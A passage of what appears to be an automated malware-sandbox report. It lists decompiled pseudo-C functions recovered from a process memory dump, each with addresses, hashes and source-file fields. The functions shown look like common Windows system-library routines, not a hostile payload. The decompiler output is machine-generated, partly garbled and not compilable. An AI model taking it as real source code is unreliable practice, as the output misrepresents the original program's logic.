				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03617D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x36e7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03614620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0363F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03617D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03639AE0();
						_t23 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03676c0a
0x03676c0f
0x03676c10
0x03676c13
0x03676c15
0x03676c19
0x03676c1c
0x03676c21
0x03676c28
0x03676c3a
0x03676c2a
0x03676c33
0x03676c33
0x03676c3f
0x03676c48
0x03676c4d
0x03676c60
0x03676c65
0x03676c69
0x03676c73
0x03676c79
0x03676c7f
0x03676c86
0x03676c90
0x03676c94
0x03676ca6
0x03676cb2
0x03676cbd
0x03676cbd
0x03676cc3
0x03676cc7
0x03676ccb
0x03676cd0
0x03676cd1
0x03676ce2
0x03676ce2
0x03676c69
0x03676ced

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1faf3ab677eb0d43bfb2155f06afc6ab47f3a941b3f74536c629ddcba1eedc
Instruction ID: 46dd3251c673058393a26ae38ae896b2be1da4be74bff8a84ad45eaf430e3076
Opcode Fuzzy Hash: 8e1faf3ab677eb0d43bfb2155f06afc6ab47f3a941b3f74536c629ddcba1eedc
Instruction Fuzzy Hash: 3921BCB5A00A44AFC711DF69D980F6AB7B8FF49700F080069F804CB790D634ED10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 036390AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E036390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0364D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0362E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03614620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0363F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0362A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x036390af
0x036390b8
0x036390bb
0x036390bf
0x036390c2
0x036390c2
0x036390c8
0x036390cb
0x036390cd
0x036714d7
0x036714eb
0x036714eb
0x00000000
0x036714eb
0x036714db
0x036714e6
0x00000000
0x036714f2
0x036714e8
0x00000000
0x036714e8
0x036390d8
0x036390da
0x036390dd
0x036390e5
0x00000000
0x03639139
0x036390fa
0x036390fe
0x03639142
0x00000000
0x03639142
0x03639104
0x03639107
0x0363910b
0x03639110
0x03639118
0x03639147
0x03639148
0x0363914f
0x03639150
0x03639151
0x03639152
0x03639156
0x0363915d
0x03639160
0x03639168
0x0363916c
0x036391bc
0x036391be
0x00000000
0x036391be
0x0363916e
0x03639173
0x03639176
0x00000000
0x00000000
0x0363917c
0x03639180
0x036391b5
0x00000000
0x036391b5
0x03639182
0x03639185
0x03639189
0x00000000
0x00000000
0x0363918e
0x03639190
0x03639198
0x00000000
0x00000000
0x036391a0
0x00000000
0x036391ad
0x036391ad
0x036391b0
0x036391b1
0x00000000
0x03639185
0x0363911a
0x0363911c
0x0363911f
0x03639125
0x03639127
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 7d212342832b996f493a85eb8be72c51870033c2ea7dbb53646e3736bdf18672
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 27218375A00304EFDB20DF55C984E9AFBF8EB45310F14846AE985AB210D770ED00CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03623B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E03623B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x36e84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x36e84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x36e84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0363AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0363FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x36e84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x36e84c4; // 0x0
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x03623b89
0x03623b96
0x03623ba1
0x03623bab
0x03623bb5
0x03623bb9
0x03666298
0x03623bbf
0x03623bc2
0x03623bc3
0x03623bc9
0x03623bca
0x03623bcc
0x03623bcd
0x03623bd4
0x03623bd6
0x03623bdb
0x03623bea
0x03623bf7
0x03623bfb
0x03623bff
0x03623c09
0x03623c0a
0x03623c0b
0x03623c0f
0x03623c14
0x03623c18
0x03623c18
0x03623bfb
0x03623c1b
0x03623c30
0x03623c30
0x03623c3d

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63eb2f7d42d3e7956c36d4e5f2307723826b18dfc4a41fd02ea525248cf2d6ca
Instruction ID: 1408e0c467f1163befbcb8d50a1dbfd68f06773e224ab81b0c6aa2b13df3d2b5
Opcode Fuzzy Hash: 63eb2f7d42d3e7956c36d4e5f2307723826b18dfc4a41fd02ea525248cf2d6ca
Instruction Fuzzy Hash: C521BE72A00618EFD701DF98CE81B5ABBBDFB40708F250068E908AF252C775AD159BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03676CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03676CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03617D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03617D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x35d5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0362F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0362F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03677016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03612400( &_v52);
								}
								_t21 = L03612400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03676cfb
0x03676d00
0x03676d02
0x03676d06
0x03676d0a
0x03676d0e
0x03676d19
0x03676d2b
0x03676d1b
0x03676d24
0x03676d24
0x03676d33
0x03676d39
0x03676d46
0x03676d4f
0x03676d61
0x03676d51
0x03676d5a
0x03676d5a
0x03676d69
0x03676d6b
0x03676d6d
0x03676d6f
0x03676d6f
0x03676d74
0x03676d79
0x03676d7a
0x03676d7f
0x03676d82
0x03676d88
0x03676d89
0x03676d90
0x03676d94
0x03676da7
0x03676db1
0x03676db1
0x03676dbb
0x03676dbb
0x03676d90
0x03676d69
0x03676d46
0x03676dc6

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60da6b5a40f1e1ce863a5e15a8cf8f024e99ee54bd4b8d783bee989416321d3b
Instruction ID: 47856dbba75023d0fc438dedc60402c3aaf988273b3a5bb9129363f11495ed93
Opcode Fuzzy Hash: 60da6b5a40f1e1ce863a5e15a8cf8f024e99ee54bd4b8d783bee989416321d3b
Instruction Fuzzy Hash: C3210472500B449FC311DF69CA44FABBBECEF81640F48095AFD40EB260E734C909C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 036C070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E036C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E036C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E036BAFDE( &_v8,  &_v12);
					E036C1293(_t38, _v28, _t60);
					if(E03617D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E036B14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x036c071b
0x036c0724
0x036c0734
0x036c0738
0x036c074b
0x036c074b
0x036c0753
0x036c0753
0x036c0759
0x036c075d
0x036c0774
0x036c0779
0x036c077d
0x036c0789
0x036c0795
0x036c07a7
0x036c0797
0x036c07a0
0x036c07a0
0x036c07af
0x036c07c4
0x036c07cd
0x036c07cd
0x036c07af
0x036c07dc

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: d160d36715ef8ec905006cd0b55608d73d3eb69ee6fe58cd9dd6a85c7e3b6960
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 7621043A204344AFD709DF18C894BAABBA5EFC4750F08856DF9958F381D730D909CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 03677794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03677794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x36e7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0363F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03617D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03639AE0();
					_t24 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03677799
0x0367779a
0x0367779b
0x036777a3
0x036777ab
0x036777ae
0x036777b1
0x036777b1
0x036777bf
0x036777c4
0x036777c8
0x036777ce
0x036777d4
0x036777e0
0x036777e0
0x036777d6
0x036777d6
0x036777de
0x00000000
0x00000000
0x036777de
0x036777e5
0x036777f0
0x036777f3
0x036777f6
0x036777fd
0x03677800
0x0367780c
0x03677818
0x0367782b
0x0367781a
0x03677823
0x03677823
0x03677830
0x03677831
0x03677838
0x0367783d
0x0367783e
0x0367784f
0x0367784f
0x0367785a

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f88f45d3e3dec475a434eb067ea36f00450afe2021fc6803a6fa59d030ff2c0f
Instruction ID: c0065e4efa71a4f1e1c17a9c368dc5528bc1d10621f24773e11eedc89fc8e78a
Opcode Fuzzy Hash: f88f45d3e3dec475a434eb067ea36f00450afe2021fc6803a6fa59d030ff2c0f
Instruction Fuzzy Hash: 8721C076900604AFC725DF69DC84EABB7B9EF48340F14056DF50ACB750D634E900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0361AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0361AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03617D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03617D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03617D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03617D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03677794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0361ae78
0x0361ae7c
0x0361ae7e
0x0361ae81
0x0361ae86
0x0361ae8d
0x03662691
0x0361ae93
0x0361ae93
0x0361ae93
0x0361ae98
0x0361ae9d
0x036626a2
0x036626b4
0x036626a4
0x036626ad
0x036626ad
0x036626b9
0x00000000
0x036626bb
0x00000000
0x036626bb
0x0361aea3
0x0361aea3
0x0361aea3
0x0361aeaa
0x036626c0
0x036626c9
0x036626c9
0x0361aeb3
0x036626d4
0x036626e1
0x00000000
0x00000000
0x036626e7
0x036626ee
0x036626f0
0x036626f9
0x036626f9
0x03662702
0x03662708
0x03662708
0x0366270b
0x0366270f
0x03662711
0x03662711
0x03662725
0x03662725
0x00000000
0x0361aeb9
0x0361aeb9
0x0361aebf
0x0361aebf
0x0361aeb3

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 24eda6475e987faff7237583cb7e1ac1b0ab8a7d04c1df7ea7d5abc49cdbb60b
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 6C210E71A026859FDB22DB68CA58B2577E8EF40380F0D04E0EC04CB3A2E778DC61C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0362FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0362FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E036076E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0362fd9b
0x0362fda0
0x0362fda1
0x0362fdab
0x0362fdad
0x0362fdb0
0x0362fdb8
0x0362fe0f
0x0362fde6
0x0362fde9
0x0362fdec
0x0366c0c0
0x0362fdfe
0x0362fe06
0x0362fe06
0x0366c0c8
0x0362fe2d
0x0362fe2d
0x00000000
0x0362fe2d
0x0366c0d1
0x0366c0e0
0x0366c0e5
0x0366c0e5
0x0366c0e8
0x00000000
0x0366c0e8
0x0362fdf4
0x00000000
0x00000000
0x0362fdf6
0x0362fdfa
0x0362fe1a
0x0362fe1f
0x0362fe1f
0x0362fdfc
0x00000000
0x0362fdfc
0x0362fdcc
0x0362fdd0
0x0362fe26
0x00000000
0x0362fe26
0x0362fdd8
0x0362fddb
0x0362fddd
0x0362fde0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 705e7369eb4be596579dd36f695b1348b242621485e54719c872a0a4b9de243e
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 80217C72600A55DBC735CF19C640E66FBF9EB94A10F2A856EE9898BB11D731AC01CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0362B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0362B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03612280(_t12, 0x36e8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E036300C2(0x36e8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0362b395
0x0362b3a2
0x0362b3a5
0x0362b3aa
0x0362b3b2
0x0362b3ba
0x0362b3bd
0x0362b3c0
0x0362b3c4
0x0362b3c9
0x0366a3e9
0x0366a3ed
0x0366a3f0
0x0366a3ff
0x0366a403
0x0366a409
0x00000000
0x00000000
0x0366a40b
0x0366a40b
0x0366a40f
0x0366a415
0x0366a423
0x0366a423
0x0366a415
0x0362b3d1
0x0362b3e8
0x0362b3e8
0x0362b3d9

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f125f44762431dc70e8389ad0eb0c8f5c3327ed05ea08178ab54e21132b753
Instruction ID: 6e2b2ed7bab83f16fa876cec5327294ef7e23bf185d43468e08ccff48aaf8bc4
Opcode Fuzzy Hash: 67f125f44762431dc70e8389ad0eb0c8f5c3327ed05ea08178ab54e21132b753
Instruction Fuzzy Hash: 2C11AB373022249BCB28CE54CE80A2B775AEBC5770B29012DDD16EB380DA719C02C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 035F9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E035F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x36cf708);
				E0364D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E036395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E036395D0();
				_t33 =  *0x36e84c4; // 0x0
				L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x36e84c4; // 0x0
				L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x36e84c4; // 0x0
				E03612280(L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x36e86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
